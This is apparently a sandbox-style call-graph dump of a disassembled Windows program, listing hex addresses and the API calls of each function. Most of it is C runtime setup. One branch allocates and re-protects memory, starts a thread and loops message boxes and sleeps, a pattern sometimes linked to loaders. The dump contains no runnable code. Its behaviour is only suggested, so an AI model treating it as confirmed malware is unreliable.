10786 bdf27e 10784->10786 10789 bdf2dc 10785->10789 10787 bd75d4 14 API calls 10786->10787 10792 bde53f 10787->10792 10795 bdf1dc 10788->10795 10791 bd75d4 14 API calls 10789->10791 10793 bdf2e4 10791->10793 10792->10770 10792->10776 10794 bd748c 25 API calls 10793->10794 10794->10792 10796 bdf1e8 10795->10796 10806 bdba53 EnterCriticalSection 10796->10806 10798 bdf1f6 10799 bdf21d 10798->10799 10800 bdf228 10798->10800 10807 bdf2f5 10799->10807 10802 bd75d4 14 API calls 10800->10802 10803 bdf223 10802->10803 10822 bdf25c 10803->10822 10806->10798 10808 bdbb2a 25 API calls 10807->10808 10811 bdf305 10808->10811 10809 bdf30b 10825 bdba99 10809->10825 10811->10809 10812 bdbb2a 25 API calls 10811->10812 10820 bdf33d 10811->10820 10815 bdf334 10812->10815 10813 bdbb2a 25 API calls 10816 bdf349 CloseHandle 10813->10816 10817 bdbb2a 25 API calls 10815->10817 10816->10809 10818 bdf355 GetLastError 10816->10818 10817->10820 10818->10809 10819 bd759e 14 API calls 10821 bdf385 10819->10821 10820->10809 10820->10813 10821->10803 10834 bdba76 LeaveCriticalSection 10822->10834 10824 bdf245 10824->10792 10826 bdbb0f 10825->10826 10827 bdbaa8 10825->10827 10828 bd75d4 14 API calls 10826->10828 10827->10826 10832 bdbad2 10827->10832 10829 bdbb14 10828->10829 10830 bd75c1 14 API calls 10829->10830 10831 bdbaff 10830->10831 10831->10819 10831->10821 10832->10831 10833 bdbaf9 SetStdHandle 10832->10833 10833->10831 10834->10824 10835->10779 10836->10759 8552 bd459c 8553 bd45a8 8552->8553 8580 bd40c5 8553->8580 8555 bd45af 8556 bd4702 8555->8556 8568 bd45d9 8555->8568 8625 bd4959 IsProcessorFeaturePresent 8556->8625 8558 bd4709 8629 bd7ccf 8558->8629 8563 bd45f8 8564 bd4679 8591 bd4a74 8564->8591 8568->8563 8568->8564 8605 bd7ca9 8568->8605 8581 bd40ce 8580->8581 8635 bd4775 IsProcessorFeaturePresent 8581->8635 8585 bd40df 8586 bd40e3 8585->8586 8645 bd8629 8585->8645 8586->8555 8589 bd40fa 8589->8555 8906 bd5210 8591->8906 8594 bd467f 8595 bd86ee 8594->8595 8908 bdad73 8595->8908 8597 bd86f7 8599 bd4687 8597->8599 8914 bdb099 8597->8914 8600 bd3bdd GetCommandLineA 8599->8600 9333 bd3a86 VirtualAlloc VirtualProtect 8600->9333 8606 bd783d 8605->8606 8607 bd7cbf 8605->8607 8608 bd90a4 37 API calls 8606->8608 8607->8564 8611 bd784e 8608->8611 8609 bd8a26 37 API calls 8610 bd7878 8609->8610 8612 bd91fb 14 API calls 8610->8612 8611->8609 8613 bd7887 8612->8613 8613->8564 8626 bd496f 8625->8626 8627 bd4a1a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8626->8627 8628 bd4a65 8627->8628 8628->8558 8630 bd7b2a 23 API calls 8629->8630 8631 bd470f 8630->8631 8632 bd7c93 8631->8632 8633 bd7b2a 23 API calls 8632->8633 8634 bd4717 8633->8634 8636 bd40da 8635->8636 8637 bd5c50 8636->8637 8654 bd6dd7 8637->8654 8641 bd5c61 8642 bd5c6c 8641->8642 8668 bd6e13 8641->8668 8642->8585 8644 bd5c59 8644->8585 8710 bdb2d3 8645->8710 8648 bd5c6f 8649 bd5c78 8648->8649 8650 bd5c82 8648->8650 8651 bd5e9f 6 API calls 8649->8651 8650->8586 8652 bd5c7d 8651->8652 8653 bd6e13 DeleteCriticalSection 8652->8653 8653->8650 8655 bd6de0 8654->8655 8657 bd6e09 8655->8657 8658 bd5c55 8655->8658 8672 bd7016 8655->8672 8659 bd6e13 DeleteCriticalSection 8657->8659 8658->8644 8660 bd5e6c 8658->8660 8659->8658 8691 bd6f27 8660->8691 8665 bd5e9c 8665->8641 8667 bd5e81 8667->8641 8669 bd6e3d 8668->8669 8670 bd6e1e 8668->8670 8669->8644 8671 bd6e28 DeleteCriticalSection 8670->8671 8671->8669 8671->8671 8677 bd6edd 8672->8677 8675 bd704e InitializeCriticalSectionAndSpinCount 8676 bd7039 8675->8676 8676->8655 8678 bd6ef6 8677->8678 8682 bd6f19 8677->8682 8678->8682 8683 bd6e42 8678->8683 8681 bd6f0b GetProcAddress 8681->8682 8682->8675 8682->8676 8689 bd6e4e 8683->8689 8684 bd6ec3 8684->8681 8684->8682 8685 bd6e65 LoadLibraryExW 8686 bd6eca 8685->8686 8687 bd6e83 GetLastError 8685->8687 8686->8684 8688 bd6ed2 FreeLibrary 8686->8688 8687->8689 8688->8684 8689->8684 8689->8685 8690 bd6ea5 LoadLibraryExW 8689->8690 8690->8686 8690->8689 8692 bd6edd 5 API calls 8691->8692 8693 bd6f41 8692->8693 8694 bd6f5a TlsAlloc 8693->8694 8695 bd5e76 8693->8695 8695->8667 8696 bd6fd8 8695->8696 8697 bd6edd 5 API calls 8696->8697 8698 bd6ff2 8697->8698 8699 bd700d TlsSetValue 8698->8699 8700 bd5e8f 8698->8700 8699->8700 8700->8665 8701 bd5e9f 8700->8701 8702 bd5ea9 8701->8702 8703 bd5eaf 8701->8703 8705 bd6f62 8702->8705 8703->8667 8706 bd6edd 5 API calls 8705->8706 8707 bd6f7c 8706->8707 8708 bd6f94 TlsFree 8707->8708 8709 bd6f88 8707->8709 8708->8709 8709->8703 8711 bdb2e3 8710->8711 8712 bd40ec 8710->8712 8711->8712 8714 bd961d 8711->8714 8712->8589 8712->8648 8715 bd9629 8714->8715 8726 bd9d97 EnterCriticalSection 8715->8726 8717 bd9630 8727 bdb9b5 8717->8727 8720 bd964e 8751 bd9674 8720->8751 8726->8717 8728 bdb9c1 8727->8728 8729 bdb9eb 8728->8729 8730 bdb9ca 8728->8730 8754 bd9d97 EnterCriticalSection 8729->8754 8762 bd75d4 8730->8762 8735 bdba23 8768 bdba4a 8735->8768 8736 bd963f 8736->8720 8740 bd94b3 GetStartupInfoW 8736->8740 8737 bdb9f7 8737->8735 8755 bdb905 8737->8755 8741 bd9564 8740->8741 8742 bd94d0 8740->8742 8746 bd9569 8741->8746 8742->8741 8743 bdb9b5 26 API calls 8742->8743 8745 bd94f8 8743->8745 8744 bd9528 GetFileType 8744->8745 8745->8741 8745->8744 8750 bd9570 8746->8750 8747 bd95b3 GetStdHandle 8747->8750 8748 bd9619 8748->8720 8749 bd95c6 GetFileType 8749->8750 8750->8747 8750->8748 8750->8749 8905 bd9ddf LeaveCriticalSection 8751->8905 8753 bd965f 8753->8711 8754->8737 8771 bd9e27 8755->8771 8757 bdb917 8761 bdb924 8757->8761 8778 bd999f 8757->8778 8759 bdb979 8759->8737 8783 bd8b82 8761->8783 8815 bd91fb GetLastError 8762->8815 8764 bd75d9 8765 bd748c 8764->8765 8879 bd7428 8765->8879 8767 bd7498 8767->8736 8904 bd9ddf LeaveCriticalSection 8768->8904 8770 bdba51 8770->8736 8776 bd9e34 8771->8776 8772 bd9e74 8775 bd75d4 13 API calls 8772->8775 8773 bd9e5f RtlAllocateHeap 8774 bd9e72 8773->8774 8773->8776 8774->8757 8775->8774 8776->8772 8776->8773 8789 bd893e 8776->8789 8802 bd97be 8778->8802 8780 bd99bb 8781 bd99d9 InitializeCriticalSectionAndSpinCount 8780->8781 8782 bd99c4 8780->8782 8781->8782 8782->8757 8784 bd8b8d HeapFree 8783->8784 8785 bd8bb6 8783->8785 8784->8785 8786 bd8ba2 8784->8786 8785->8759 8787 bd75d4 12 API calls 8786->8787 8788 bd8ba8 GetLastError 8787->8788 8788->8785 8792 bd896b 8789->8792 8793 bd8977 8792->8793 8798 bd9d97 EnterCriticalSection 8793->8798 8795 bd8982 8799 bd89be 8795->8799 8798->8795 8800 bd9ddf LeaveCriticalSection 8799->8800 8801 bd8949 8800->8801 8801->8776 8803 bd97ec 8802->8803 8807 bd97e8 8802->8807 8803->8807 8808 bd96f7 8803->8808 8806 bd9806 GetProcAddress 8806->8807 8807->8780 8813 bd9708 8808->8813 8809 bd97b3 8809->8806 8809->8807 8810 bd9726 LoadLibraryExW 8811 bd9741 GetLastError 8810->8811 8810->8813 8811->8813 8812 bd979c FreeLibrary 8812->8813 8813->8809 8813->8810 8813->8812 8814 bd9774 LoadLibraryExW 8813->8814 8814->8813 8816 bd9218 8815->8816 8817 bd9212 8815->8817 8836 bd921e SetLastError 8816->8836 8843 bd995d 8816->8843 8838 bd991e 8817->8838 8821 bd9e27 12 API calls 8823 bd9246 8821->8823 8824 bd924e 8823->8824 8825 bd9265 8823->8825 8827 bd995d 6 API calls 8824->8827 8826 bd995d 6 API calls 8825->8826 8828 bd9271 8826->8828 8829 bd925c 8827->8829 8830 bd9275 8828->8830 8831 bd9286 8828->8831 8834 bd8b82 12 API calls 8829->8834 8832 bd995d 6 API calls 8830->8832 8848 bd8ed2 8831->8848 8832->8829 8834->8836 8836->8764 8837 bd8b82 12 API calls 8837->8836 8839 bd97be 5 API calls 8838->8839 8840 bd993a 8839->8840 8841 bd9955 TlsGetValue 8840->8841 8842 bd9943 8840->8842 8842->8816 8844 bd97be 5 API calls 8843->8844 8845 bd9979 8844->8845 8846 bd9997 TlsSetValue 8845->8846 8847 bd9236 8845->8847 8847->8821 8847->8836 8853 bd8d66 8848->8853 8854 bd8d72 8853->8854 8867 bd9d97 EnterCriticalSection 8854->8867 8856 bd8d7c 8868 bd8dac 8856->8868 8859 bd8e78 8860 bd8e84 8859->8860 8871 bd9d97 EnterCriticalSection 8860->8871 8862 bd8e8e 8872 bd9059 8862->8872 8864 bd8ea6 8876 bd8ec6 8864->8876 8867->8856 8869 bd9ddf LeaveCriticalSection 8868->8869 8870 bd8d9a 8869->8870 8870->8859 8871->8862 8873 bd9068 8872->8873 8875 bd908f 8872->8875 8874 bdbff1 14 API calls 8873->8874 8873->8875 8874->8875 8875->8864 8877 bd9ddf LeaveCriticalSection 8876->8877 8878 bd8eb4 8877->8878 8878->8837 8880 bd91fb 14 API calls 8879->8880 8881 bd7433 8880->8881 8882 bd7441 8881->8882 8887 bd749c IsProcessorFeaturePresent 8881->8887 8882->8767 8884 bd748b 8885 bd7428 25 API calls 8884->8885 8886 bd7498 8885->8886 8886->8767 8888 bd74a8 8887->8888 8891 bd72e0 8888->8891 8892 bd72fc 8891->8892 8893 bd7328 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8892->8893 8894 bd73f9 8893->8894 8897 bd403c 8894->8897 8896 bd7417 GetCurrentProcess TerminateProcess 8896->8884 8898 bd4045 IsProcessorFeaturePresent 8897->8898 8899 bd4044 8897->8899 8901 bd4317 8898->8901 8899->8896 8902 bd42da SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8901->8902 8903 bd43fa 8902->8903 8903->8896 8904->8770 8905->8753 8907 bd4a87 GetStartupInfoW 8906->8907 8907->8594 8909 bdad7c 8908->8909 8910 bdadae 8908->8910 8917 bd9161 8909->8917 8910->8597 9330 bdb042 8914->9330 8918 bd916c 8917->8918 8919 bd9172 8917->8919 8920 bd991e 6 API calls 8918->8920 8921 bd995d 6 API calls 8919->8921 8941 bd9178 8919->8941 8920->8919 8922 bd918c 8921->8922 8923 bd9e27 14 API calls 8922->8923 8922->8941 8925 bd919c 8923->8925 8927 bd91b9 8925->8927 8928 bd91a4 8925->8928 8931 bd995d 6 API calls 8927->8931 8930 bd995d 6 API calls 8928->8930 8929 bd91f1 8942 bdabbf 8929->8942 8932 bd91b0 8930->8932 8933 bd91c5 8931->8933 8936 bd8b82 14 API calls 8932->8936 8934 bd91c9 8933->8934 8935 bd91d8 8933->8935 8937 bd995d 6 API calls 8934->8937 8938 bd8ed2 14 API calls 8935->8938 8936->8941 8937->8932 8939 bd91e3 8938->8939 8940 bd8b82 14 API calls 8939->8940 8940->8941 8941->8929 8961 bd8a26 8941->8961 9054 bdacd3 8942->9054 8947 bdabeb 8947->8910 8952 bd8b82 14 API calls 8954 bdac3c 8952->8954 8953 bdac29 8955 bd75d4 14 API calls 8953->8955 8954->8910 8957 bdac2e 8955->8957 8956 bdac44 8958 bdac70 8956->8958 8960 bd8b82 14 API calls 8956->8960 8957->8952 8958->8957 9090 bda85b 8958->9090 8960->8958 8979 bdb43a 8961->8979 8964 bd8a36 8965 bd8a40 IsProcessorFeaturePresent 8964->8965 8966 bd8a5f 8964->8966 8968 bd8a4c 8965->8968 8969 bd7c93 23 API calls 8966->8969 8970 bd72e0 8 API calls 8968->8970 8972 bd8a69 8969->8972 8970->8966 8971 bd8a85 8973 bd75d4 14 API calls 8971->8973 8972->8971 8977 bd8a9c 8972->8977 8974 bd8a8d 8973->8974 8975 bd748c 25 API calls 8974->8975 8976 bd8a97 8975->8976 8977->8976 8978 bd75d4 14 API calls 8977->8978 8978->8974 9009 bdb36c 8979->9009 8982 bdb47f 8983 bdb48b 8982->8983 8984 bd91fb 14 API calls 8983->8984 8986 bdb4b2 8983->8986 8990 bdb4b8 8983->8990 8984->8986 8985 bdb4ff 8988 bd75d4 14 API calls 8985->8988 8986->8985 8987 bdb4e9 8986->8987 8986->8990 8987->8964 8989 bdb504 8988->8989 8991 bd748c 25 API calls 8989->8991 8992 bdb52b 8990->8992 9020 bd9d97 EnterCriticalSection 8990->9020 8991->8987 8995 bdb56d 8992->8995 8996 bdb65e 8992->8996 9007 bdb59c 8992->9007 8995->9007 9021 bd90a4 GetLastError 8995->9021 8997 bdb669 8996->8997 9052 bd9ddf LeaveCriticalSection 8996->9052 9000 bd7c93 23 API calls 8997->9000 9002 bdb671 9000->9002 9003 bdb5f1 9003->8987 9008 bd90a4 37 API calls 9003->9008 9005 bd90a4 37 API calls 9005->9003 9006 bd90a4 37 API calls 9006->9007 9048 bdb60b 9007->9048 9008->8987 9010 bdb378 9009->9010 9015 bd9d97 EnterCriticalSection 9010->9015 9012 bdb386 9016 bdb3c4 9012->9016 9015->9012 9019 bd9ddf LeaveCriticalSection 9016->9019 9018 bd8a2b 9018->8964 9018->8982 9019->9018 9020->8992 9022 bd90bb 9021->9022 9023 bd90c1 9021->9023 9024 bd991e 6 API calls 9022->9024 9025 bd995d 6 API calls 9023->9025 9045 bd90c7 SetLastError 9023->9045 9024->9023 9026 bd90df 9025->9026 9027 bd9e27 14 API calls 9026->9027 9026->9045 9029 bd90ef 9027->9029 9032 bd910e 9029->9032 9033 bd90f7 9029->9033 9030 bd915b 9034 bd8a26 35 API calls 9030->9034 9031 bd9155 9031->9006 9035 bd995d 6 API calls 9032->9035 9036 bd995d 6 API calls 9033->9036 9037 bd9160 9034->9037 9038 bd911a 9035->9038 9039 bd9105 9036->9039 9040 bd912f 9038->9040 9041 bd911e 9038->9041 9042 bd8b82 14 API calls 9039->9042 9044 bd8ed2 14 API calls 9040->9044 9043 bd995d 6 API calls 9041->9043 9042->9045 9043->9039 9046 bd913a 9044->9046 9045->9030 9045->9031 9047 bd8b82 14 API calls 9046->9047 9047->9045 9049 bdb611 9048->9049 9051 bdb5e2 9048->9051 9053 bd9ddf LeaveCriticalSection 9049->9053 9051->8987 9051->9003 9051->9005 9052->8997 9053->9051 9055 bdacdf 9054->9055 9061 bdacf9 9055->9061 9098 bd9d97 EnterCriticalSection 9055->9098 9057 bdad09 9063 bd8b82 14 API calls 9057->9063 9064 bdad35 9057->9064 9059 bd8a26 37 API calls 9062 bdad72 9059->9062 9060 bdabd2 9065 bda969 9060->9065 9061->9059 9061->9060 9063->9064 9099 bdad52 9064->9099 9103 bd70e3 9065->9103 9068 bda99c 9070 bda9b3 9068->9070 9071 bda9a1 GetACP 9068->9071 9069 bda98a GetOEMCP 9069->9070 9070->8947 9072 bd8bbc 9070->9072 9071->9070 9073 bd8bfa 9072->9073 9077 bd8bca 9072->9077 9074 bd75d4 14 API calls 9073->9074 9076 bd8bf8 9074->9076 9075 bd8be5 RtlAllocateHeap 9075->9076 9075->9077 9076->8957 9079 bdadce 9076->9079 9077->9073 9077->9075 9078 bd893e 2 API calls 9077->9078 9078->9077 9080 bda969 39 API calls 9079->9080 9081 bdadee 9080->9081 9083 bdae28 IsValidCodePage 9081->9083 9087 bdae64 9081->9087 9082 bd403c 5 API calls 9084 bdac21 9082->9084 9085 bdae3a 9083->9085 9083->9087 9084->8953 9084->8956 9086 bdae69 GetCPInfo 9085->9086 9089 bdae43 9085->9089 9086->9087 9086->9089 9087->9082 9220 bdaa3f 9089->9220 9091 bda867 9090->9091 9304 bd9d97 EnterCriticalSection 9091->9304 9093 bda871 9305 bda8a8 9093->9305 9098->9057 9102 bd9ddf LeaveCriticalSection 9099->9102 9101 bdad59 9101->9061 9102->9101 9104 bd70fa 9103->9104 9105 bd7103 9103->9105 9104->9068 9104->9069 9105->9104 9106 bd90a4 37 API calls 9105->9106 9107 bd7123 9106->9107 9111 bd92f6 9107->9111 9112 bd9309 9111->9112 9113 bd7139 9111->9113 9112->9113 9119 bdc23d 9112->9119 9115 bd9323 9113->9115 9116 bd934b 9115->9116 9117 bd9336 9115->9117 9116->9104 9117->9116 9215 bdadbb 9117->9215 9120 bdc249 9119->9120 9121 bd90a4 37 API calls 9120->9121 9122 bdc252 9121->9122 9129 bdc298 9122->9129 9132 bd9d97 EnterCriticalSection 9122->9132 9124 bdc270 9133 bdc2be 9124->9133 9129->9113 9130 bd8a26 37 API calls 9131 bdc2bd 9130->9131 9132->9124 9134 bdc2cc 9133->9134 9136 bdc281 9133->9136 9134->9136 9140 bdbff1 9134->9140 9137 bdc29d 9136->9137 9214 bd9ddf LeaveCriticalSection 9137->9214 9139 bdc294 9139->9129 9139->9130 9142 bdc071 9140->9142 9143 bdc007 9140->9143 9144 bd8b82 14 API calls 9142->9144 9166 bdc0bf 9142->9166 9143->9142 9148 bdc03a 9143->9148 9150 bd8b82 14 API calls 9143->9150 9145 bdc093 9144->9145 9146 bd8b82 14 API calls 9145->9146 9147 bdc0a6 9146->9147 9152 bd8b82 14 API calls 9147->9152 9153 bd8b82 14 API calls 9148->9153 9167 bdc05c 9148->9167 9149 bd8b82 14 API calls 9154 bdc066 9149->9154 9156 bdc02f 9150->9156 9151 bdc0cd 9155 bdc12d 9151->9155 9162 bd8b82 14 API calls 9151->9162 9157 bdc0b4 9152->9157 9158 bdc051 9153->9158 9159 bd8b82 14 API calls 9154->9159 9160 bd8b82 14 API calls 9155->9160 9168 bdbbaa 9156->9168 9163 bd8b82 14 API calls 9157->9163 9196 bdbca8 9158->9196 9159->9142 9165 bdc133 9160->9165 9162->9151 9163->9166 9165->9136 9208 bdc162 9166->9208 9167->9149 9169 bdbbbb 9168->9169 9195 bdbca4 9168->9195 9170 bd8b82 14 API calls 9169->9170 9173 bdbbcc 9169->9173 9170->9173 9171 bdbbde 9172 bdbbf0 9171->9172 9175 bd8b82 14 API calls 9171->9175 9176 bdbc02 9172->9176 9177 bd8b82 14 API calls 9172->9177 9173->9171 9174 bd8b82 14 API calls 9173->9174 9174->9171 9175->9172 9178 bdbc14 9176->9178 9179 bd8b82 14 API calls 9176->9179 9177->9176 9180 bdbc26 9178->9180 9182 bd8b82 14 API calls 9178->9182 9179->9178 9181 bdbc38 9180->9181 9183 bd8b82 14 API calls 9180->9183 9184 bdbc4a 9181->9184 9185 bd8b82 14 API calls 9181->9185 9182->9180 9183->9181 9186 bdbc5c 9184->9186 9187 bd8b82 14 API calls 9184->9187 9185->9184 9188 bdbc6e 9186->9188 9190 bd8b82 14 API calls 9186->9190 9187->9186 9189 bdbc80 9188->9189 9191 bd8b82 14 API calls 9188->9191 9192 bdbc92 9189->9192 9193 bd8b82 14 API calls 9189->9193 9190->9188 9191->9189 9194 bd8b82 14 API calls 9192->9194 9192->9195 9193->9192 9194->9195 9195->9148 9197 bdbcb5 9196->9197 9207 bdbd0d 9196->9207 9198 bdbcc5 9197->9198 9199 bd8b82 14 API calls 9197->9199 9200 bd8b82 14 API calls 9198->9200 9204 bdbcd7 9198->9204 9199->9198 9200->9204 9201 bd8b82 14 API calls 9203 bdbce9 9201->9203 9202 bdbcfb 9206 bd8b82 14 API calls 9202->9206 9202->9207 9203->9202 9205 bd8b82 14 API calls 9203->9205 9204->9201 9204->9203 9205->9202 9206->9207 9207->9167 9209 bdc16f 9208->9209 9210 bdc18e 9208->9210 9209->9210 9211 bdbd49 14 API calls 9209->9211 9210->9151 9212 bdc188 9211->9212 9213 bd8b82 14 API calls 9212->9213 9213->9210 9214->9139 9216 bd90a4 37 API calls 9215->9216 9217 bdadc5 9216->9217 9218 bdacd3 37 API calls 9217->9218 9219 bdadcb 9218->9219 9219->9116 9221 bdaa67 GetCPInfo 9220->9221 9222 bdab30 9220->9222 9221->9222 9228 bdaa7f 9221->9228 9223 bd403c 5 API calls 9222->9223 9224 bdabbd 9223->9224 9224->9087 9231 bdbe51 9228->9231 9230 bdd34e 41 API calls 9230->9222 9232 bd70e3 37 API calls 9231->9232 9233 bdbe71 9232->9233 9251 bdb0ca 9233->9251 9235 bdbe9e 9238 bd8bbc 15 API calls 9235->9238 9241 bdbec4 9235->9241 9242 bdbf2f 9235->9242 9236 bd403c 5 API calls 9239 bdaae7 9236->9239 9237 bdbf29 9254 bdbf54 9237->9254 9238->9241 9246 bdd34e 9239->9246 9241->9237 9243 bdb0ca MultiByteToWideChar 9241->9243 9242->9236 9244 bdbf12 9243->9244 9244->9237 9245 bdbf19 GetStringTypeW 9244->9245 9245->9237 9247 bd70e3 37 API calls 9246->9247 9248 bdd361 9247->9248 9258 bdd164 9248->9258 9252 bdb0db MultiByteToWideChar 9251->9252 9252->9235 9255 bdbf60 9254->9255 9256 bdbf71 9254->9256 9255->9256 9257 bd8b82 14 API calls 9255->9257 9256->9242 9257->9256 9259 bdd17f 9258->9259 9260 bdb0ca MultiByteToWideChar 9259->9260 9264 bdd1c3 9260->9264 9261 bdd328 9262 bd403c 5 API calls 9261->9262 9263 bdab08 9262->9263 9263->9230 9264->9261 9265 bd8bbc 15 API calls 9264->9265 9267 bdd1e8 9264->9267 9265->9267 9266 bdb0ca MultiByteToWideChar 9268 bdd22e 9266->9268 9267->9266 9280 bdd28d 9267->9280 9268->9280 9286 bd99ea 9268->9286 9269 bdbf54 14 API calls 9269->9261 9272 bdd29c 9274 bd8bbc 15 API calls 9272->9274 9279 bdd2ae 9272->9279 9273 bdd264 9276 bd99ea 6 API calls 9273->9276 9273->9280 9274->9279 9275 bdd319 9278 bdbf54 14 API calls 9275->9278 9276->9280 9277 bd99ea 6 API calls 9281 bdd2f6 9277->9281 9278->9280 9279->9275 9279->9277 9280->9269 9281->9275 9292 bdb146 9281->9292 9283 bdd310 9283->9275 9284 bdd345 9283->9284 9285 bdbf54 14 API calls 9284->9285 9285->9280 9295 bd96c3 9286->9295 9290 bd9a3b LCMapStringW 9291 bd99fb 9290->9291 9291->9272 9291->9273 9291->9280 9294 bdb15d WideCharToMultiByte 9292->9294 9294->9283 9296 bd97be 5 API calls 9295->9296 9297 bd96d9 9296->9297 9297->9291 9298 bd9a47 9297->9298 9301 bd96dd 9298->9301 9300 bd9a52 9300->9290 9302 bd97be LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9301->9302 9303 bd96f3 9302->9303 9303->9300 9304->9093 9315 bdafc1 9305->9315 9307 bda8ca 9308 bdafc1 25 API calls 9307->9308 9310 bda8e9 9308->9310 9309 bda87e 9312 bda89c 9309->9312 9310->9309 9311 bd8b82 14 API calls 9310->9311 9311->9309 9329 bd9ddf LeaveCriticalSection 9312->9329 9314 bda88a 9314->8957 9316 bdafd2 9315->9316 9320 bdafce 9315->9320 9317 bdafd9 9316->9317 9321 bdafec 9316->9321 9318 bd75d4 14 API calls 9317->9318 9319 bdafde 9318->9319 9322 bd748c 25 API calls 9319->9322 9320->9307 9321->9320 9323 bdb01a 9321->9323 9324 bdb023 9321->9324 9322->9320 9325 bd75d4 14 API calls 9323->9325 9324->9320 9327 bd75d4 14 API calls 9324->9327 9326 bdb01f 9325->9326 9328 bd748c 25 API calls 9326->9328 9327->9326 9328->9320 9329->9314 9331 bd70e3 37 API calls 9330->9331 9332 bdb056 9331->9332 9332->8597 9334 bd3b3c CreateThread 9333->9334 9335 bd3b50 9334->9335 9335->9334 9336 bd3b6a 9335->9336 9337 bd3b74 MessageBoxA 9336->9337 9338 bd3b8e 9336->9338 9337->9336 9337->9337 9339 bd3b93 MessageBoxA 9338->9339 9339->9339 9340 bd3bb7 9339->9340 9341 bd3bd0 Sleep 9340->9341 9341->9341 11323 bd8f6b 11324 bd8f76 11323->11324 11328 bd8f86 11323->11328 11329 bd8f8c 11324->11329 11327 bd8b82 14 API calls 11327->11328 11330 bd8fa7 11329->11330 11331 bd8fa1 11329->11331 11333 bd8b82 14 API calls 11330->11333 11332 bd8b82 14 API calls 11331->11332 11332->11330 11334 bd8fb3 11333->11334 11335 bd8b82 14 API calls 11334->11335 11336 bd8fbe 11335->11336 11337 bd8b82 14 API calls 11336->11337 11338 bd8fc9 11337->11338 11339 bd8b82 14 API calls 11338->11339 11340 bd8fd4 11339->11340 11341 bd8b82 14 API calls 11340->11341 11342 bd8fdf 11341->11342 11343 bd8b82 14 API calls 11342->11343 11344 bd8fea 11343->11344 11345 bd8b82 14 API calls 11344->11345 11346 bd8ff5 11345->11346 11347 bd8b82 14 API calls 11346->11347 11348 bd9000 11347->11348 11349 bd8b82 14 API calls 11348->11349 11350 bd900e 11349->11350 11355 bd8db8 11350->11355 11356 bd8dc4 11355->11356 11371 bd9d97 EnterCriticalSection 11356->11371 11359 bd8dce 11361 bd8b82 14 API calls 11359->11361 11362 bd8df8 11359->11362 11361->11362 11372 bd8e17 11362->11372 11363 bd8e23 11364 bd8e2f 11363->11364 11376 bd9d97 EnterCriticalSection 11364->11376 11366 bd8e39 11367 bd9059 14 API calls 11366->11367 11368 bd8e4c 11367->11368 11377 bd8e6c 11368->11377 11371->11359 11375 bd9ddf LeaveCriticalSection 11372->11375 11374 bd8e05 11374->11363 11375->11374 11376->11366 11380 bd9ddf LeaveCriticalSection 11377->11380 11379 bd8e5a 11379->11327 11380->11379 9588 bd7fea 9589 bdad73 47 API calls 9588->9589 9590 bd7ffc 9589->9590 9599 bdb234 GetEnvironmentStringsW 9590->9599 9594 bd8b82 14 API calls 9596 bd8036 9594->9596 9597 bd8b82 14 API calls 9598 bd8007 9597->9598 9598->9594 9600 bdb24b 9599->9600 9601 bdb2a1 9599->9601 9604 bdb146 WideCharToMultiByte 9600->9604 9602 bdb2aa FreeEnvironmentStringsW 9601->9602 9603 bd8001 9601->9603 9602->9603 9603->9598 9611 bd803c 9603->9611 9605 bdb264 9604->9605 9605->9601 9606 bd8bbc 15 API calls 9605->9606 9607 bdb274 9606->9607 9608 bdb28c 9607->9608 9609 bdb146 WideCharToMultiByte 9607->9609 9610 bd8b82 14 API calls 9608->9610 9609->9608 9610->9601 9612 bd8051 9611->9612 9613 bd9e27 14 API calls 9612->9613 9624 bd8078 9613->9624 9614 bd80dd 9615 bd8b82 14 API calls 9614->9615 9616 bd8012 9615->9616 9616->9597 9617 bd9e27 14 API calls 9617->9624 9618 bd80df 9637 bd810c 9618->9637 9622 bd8b82 14 API calls 9622->9614 9623 bd80ff 9625 bd749c 11 API calls 9623->9625 9624->9614 9624->9617 9624->9618 9624->9623 9626 bd8b82 14 API calls 9624->9626 9628 bd8a6a 9624->9628 9627 bd810b 9625->9627 9626->9624 9629 bd8a85 9628->9629 9630 bd8a77 9628->9630 9631 bd75d4 14 API calls 9629->9631 9630->9629 9635 bd8a9c 9630->9635 9632 bd8a8d 9631->9632 9633 bd748c 25 API calls 9632->9633 9634 bd8a97 9633->9634 9634->9624 9635->9634 9636 bd75d4 14 API calls 9635->9636 9636->9632 9641 bd80e5 9637->9641 9642 bd8119 9637->9642 9638 bd8130 9639 bd8b82 14 API calls 9638->9639 9639->9641 9640 bd8b82 14 API calls 9640->9642 9641->9622 9642->9638 9642->9640 11381 bd886a 11384 bd87f1 11381->11384 11385 bd87fd 11384->11385 11392 bd9d97 EnterCriticalSection 11385->11392 11387 bd8835 11393 bd8853 11387->11393 11388 bd8807 11388->11387 11390 bdc2be 14 API calls 11388->11390 11390->11388 11392->11388 11396 bd9ddf LeaveCriticalSection 11393->11396 11395 bd8841 11396->11395 10137 bd1cdd 10138 bd1cf2 10137->10138 10151 bd1c9a 10138->10151 10153 bd1105 10138->10153 10140 bd1d15 10167 bd1285 10140->10167 10141 bd1d4e 10144 bd1d67 10141->10144 10187 bd3d14 10141->10187 10142 bd1d47 FreeLibrary 10142->10141 10145 bd1d7a 10144->10145 10148 bd7188 14 API calls 10144->10148 10190 be01d4 10145->10190 10148->10144 10151->10141 10151->10142 10154 bd1117 10153->10154 10163 bd1113 10153->10163 10155 bd111b 10154->10155 10156 bd112e 10154->10156 10157 bd75d4 14 API calls 10155->10157 10160 bd1159 10156->10160 10161 bd1162 10156->10161 10156->10163 10158 bd1120 10157->10158 10159 bd748c 25 API calls 10158->10159 10159->10163 10162 bd75d4 14 API calls 10160->10162 10161->10163 10164 bd75d4 14 API calls 10161->10164 10165 bd115e 10162->10165 10163->10140 10164->10165 10166 bd748c 25 API calls 10165->10166 10166->10163 10168 bd128f 10167->10168 10171 bd12a3 10167->10171 10168->10171 10193 bd10a9 10168->10193 10172 bd2c50 10171->10172 10173 bd2c5d 10172->10173 10197 bd29e8 10173->10197 10175 bd2cdb 10177 bd403c 5 API calls 10175->10177 10176 bd2cd1 CoTaskMemFree 10176->10175 10178 bd2ce7 10177->10178 10178->10151 10179 bd2cae lstrcmpiA 10183 bd2c84 10179->10183 10180 bd2ccc 10180->10176 10181 bd2327 7 API calls 10181->10183 10182 bd2da0 91 API calls 10182->10183 10183->10175 10183->10176 10183->10179 10183->10180 10183->10181 10183->10182 10184 bd2d46 10183->10184 10252 bd22fe 10183->10252 10220 bd2da0 